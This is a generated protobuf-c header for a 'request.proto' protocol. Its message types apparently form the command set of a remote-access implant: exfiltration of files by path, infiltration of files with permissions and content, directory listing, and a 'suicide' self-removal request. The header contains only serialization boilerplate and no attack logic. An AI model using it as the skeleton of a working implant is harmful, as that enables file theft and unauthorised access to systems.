/* Generated by the protocol buffer compiler.  DO NOT EDIT! */
/* Generated from: request.proto */

#ifndef PROTOBUF_C_request_2eproto__INCLUDED
#define PROTOBUF_C_request_2eproto__INCLUDED

#include <protobuf-c/protobuf-c.h>

PROTOBUF_C__BEGIN_DECLS

#if PROTOBUF_C_VERSION_NUMBER < 1000000
# error This file was generated by a newer version of protoc-c which is incompatible with your libprotobuf-c headers. Please update your headers.
#elif 1004000 < PROTOBUF_C_MIN_COMPILER_VERSION
# error This file was generated by an older version of protoc-c which is incompatible with your libprotobuf-c headers. Please regenerate this file with a newer version of protoc-c.
#endif


typedef struct RequestHeader RequestHeader;
typedef struct ExfiltrationRequest ExfiltrationRequest;
typedef struct InfiltrationRequest InfiltrationRequest;
typedef struct ReadDirRequest ReadDirRequest;
typedef struct SuicideRequest SuicideRequest;


/* --- enums --- */

typedef enum _RequestHeader__Type {
  REQUEST_HEADER__TYPE__SUICIDE = 0,
  REQUEST_HEADER__TYPE__EXF_FILE = 1,
  REQUEST_HEADER__TYPE__INF_FILE = 2,
  REQUEST_HEADER__TYPE__READ_DIR = 3
    PROTOBUF_C__FORCE_ENUM_TO_BE_INT_SIZE(REQUEST_HEADER__TYPE)
} RequestHeader__Type;

/* --- messages --- */

struct  RequestHeader
{
  ProtobufCMessage base;
  RequestHeader__Type type;
  uint64_t size;
};
#define REQUEST_HEADER__INIT \
 { PROTOBUF_C_MESSAGE_INIT (&request_header__descriptor) \
    , REQUEST_HEADER__TYPE__SUICIDE, 0 }


struct  ExfiltrationRequest
{
  ProtobufCMessage base;
  char *path;
};
#define EXFILTRATION_REQUEST__INIT \
 { PROTOBUF_C_MESSAGE_INIT (&exfiltration_request__descriptor) \
    , NULL }


struct  InfiltrationRequest
{
  ProtobufCMessage base;
  uint32_t perm;
  char *path;
  ProtobufCBinaryData content;
};
#define INFILTRATION_REQUEST__INIT \
 { PROTOBUF_C_MESSAGE_INIT (&infiltration_request__descriptor) \
    , 0, NULL, {0,NULL} }


struct  ReadDirRequest
{
  ProtobufCMessage base;
  char *path;
};
#define READ_DIR_REQUEST__INIT \
 { PROTOBUF_C_MESSAGE_INIT (&read_dir_request__descriptor) \
    , NULL }


struct  SuicideRequest
{
  ProtobufCMessage base;
};
#define SUICIDE_REQUEST__INIT \
 { PROTOBUF_C_MESSAGE_INIT (&suicide_request__descriptor) \
     }


/* RequestHeader methods */
void   request_header__init
                     (RequestHeader         *message);
size_t request_header__get_packed_size
                     (const RequestHeader   *message);
size_t request_header__pack
                     (const RequestHeader   *message,
                      uint8_t             *out);
size_t request_header__pack_to_buffer
                     (const RequestHeader   *message,
                      ProtobufCBuffer     *buffer);
RequestHeader *
       request_header__unpack
                     (ProtobufCAllocator  *allocator,
                      size_t               len,
                      const uint8_t       *data);
void   request_header__free_unpacked
                     (RequestHeader *message,
                      ProtobufCAllocator *allocator);
/* ExfiltrationRequest methods */
void   exfiltration_request__init
                     (ExfiltrationRequest         *message);
size_t exfiltration_request__get_packed_size
                     (const ExfiltrationRequest   *message);
size_t exfiltration_request__pack
                     (const ExfiltrationRequest   *message,
                      uint8_t             *out);
size_t exfiltration_request__pack_to_buffer
                     (const ExfiltrationRequest   *message,
                      ProtobufCBuffer     *buffer);
ExfiltrationRequest *
       exfiltration_request__unpack
                     (ProtobufCAllocator  *allocator,
                      size_t               len,
                      const uint8_t       *data);
void   exfiltration_request__free_unpacked
                     (ExfiltrationRequest *message,
                      ProtobufCAllocator *allocator);
/* InfiltrationRequest methods */
void   infiltration_request__init
                     (InfiltrationRequest         *message);
size_t infiltration_request__get_packed_size
                     (const InfiltrationRequest   *message);
size_t infiltration_request__pack
                     (const InfiltrationRequest   *message,
                      uint8_t             *out);
size_t infiltration_request__pack_to_buffer
                     (const InfiltrationRequest   *message,
                      ProtobufCBuffer     *buffer);
InfiltrationRequest *
       infiltration_request__unpack
                     (ProtobufCAllocator  *allocator,
                      size_t               len,
                      const uint8_t       *data);
void   infiltration_request__free_unpacked
                     (InfiltrationRequest *message,
                      ProtobufCAllocator *allocator);
/* ReadDirRequest methods */
void   read_dir_request__init
                     (ReadDirRequest         *message);
size_t read_dir_request__get_packed_size
                     (const ReadDirRequest   *message);
size_t read_dir_request__pack
                     (const ReadDirRequest   *message,
                      uint8_t             *out);
size_t read_dir_request__pack_to_buffer
                     (const ReadDirRequest   *message,
                      ProtobufCBuffer     *buffer);
ReadDirRequest *
       read_dir_request__unpack
                     (ProtobufCAllocator  *allocator,
                      size_t               len,
                      const uint8_t       *data);
void   read_dir_request__free_unpacked
                     (ReadDirRequest *message,
                      ProtobufCAllocator *allocator);
/* SuicideRequest methods */
void   suicide_request__init
                     (SuicideRequest         *message);
size_t suicide_request__get_packed_size
                     (const SuicideRequest   *message);
size_t suicide_request__pack
                     (const SuicideRequest   *message,
                      uint8_t             *out);
size_t suicide_request__pack_to_buffer
                     (const SuicideRequest   *message,
                      ProtobufCBuffer     *buffer);
SuicideRequest *
       suicide_request__unpack
                     (ProtobufCAllocator  *allocator,
                      size_t               len,
                      const uint8_t       *data);
void   suicide_request__free_unpacked
                     (SuicideRequest *message,
                      ProtobufCAllocator *allocator);
/* --- per-message closures --- */

typedef void (*RequestHeader_Closure)
                 (const RequestHeader *message,
                  void *closure_data);
typedef void (*ExfiltrationRequest_Closure)
                 (const ExfiltrationRequest *message,
                  void *closure_data);
typedef void (*InfiltrationRequest_Closure)
                 (const InfiltrationRequest *message,
                  void *closure_data);
typedef void (*ReadDirRequest_Closure)
                 (const ReadDirRequest *message,
                  void *closure_data);
typedef void (*SuicideRequest_Closure)
                 (const SuicideRequest *message,
                  void *closure_data);

/* --- services --- */


/* --- descriptors --- */

extern const ProtobufCMessageDescriptor request_header__descriptor;
extern const ProtobufCEnumDescriptor    request_header__type__descriptor;
extern const ProtobufCMessageDescriptor exfiltration_request__descriptor;
extern const ProtobufCMessageDescriptor infiltration_request__descriptor;
extern const ProtobufCMessageDescriptor read_dir_request__descriptor;
extern const ProtobufCMessageDescriptor suicide_request__descriptor;

PROTOBUF_C__END_DECLS


#endif  /* PROTOBUF_C_request_2eproto__INCLUDED */
